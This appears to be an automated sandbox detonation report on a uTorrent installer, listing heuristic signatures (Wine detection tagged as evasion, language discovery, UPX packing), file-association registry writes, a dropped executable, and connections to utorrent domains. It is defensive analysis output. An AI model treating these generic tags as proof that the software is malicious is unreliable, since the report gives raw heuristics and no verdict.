Analysis: behavioral7

Detonation Overview

Submitted

2024-11-15 03:46

Reported

2024-11-15 03:49

Platform

win11-20241007-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe"

Signatures

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Wine C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks installed software on the system

discovery

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type\ = "application/x-bittorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\Content Type = "application/x-bittorrent-key" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\Content Type = "application/x-bittorrent-app" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids\uTorrent C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount\remote_access_client_id = "1112994294" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe

"C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe"

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

uTorrent.exe /NOINSTALL /BRINGTOFRONT

Network

Country Destination Domain Proto
US 8.8.8.8:53 router.utorrent.com udp
US 8.8.8.8:53 i-21.b-47142.ut.bench.utorrent.com udp
US 67.215.246.203:80 update.utorrent.com tcp
US 44.196.243.250:80 i-21.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.245:80 update.utorrent.li tcp

Files

memory/1580-0-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old

C:\Users\Admin\AppData\Roaming\uTorrent\toolbar.benc.new

memory/1580-25-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-26-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-27-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1580-28-0x0000000000400000-0x00000000009C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

memory/1580-44-0x0000000000400000-0x00000000009C3000-memory.dmp

memory/1240-45-0x0000000000400000-0x00000000009C3000-memory.dmp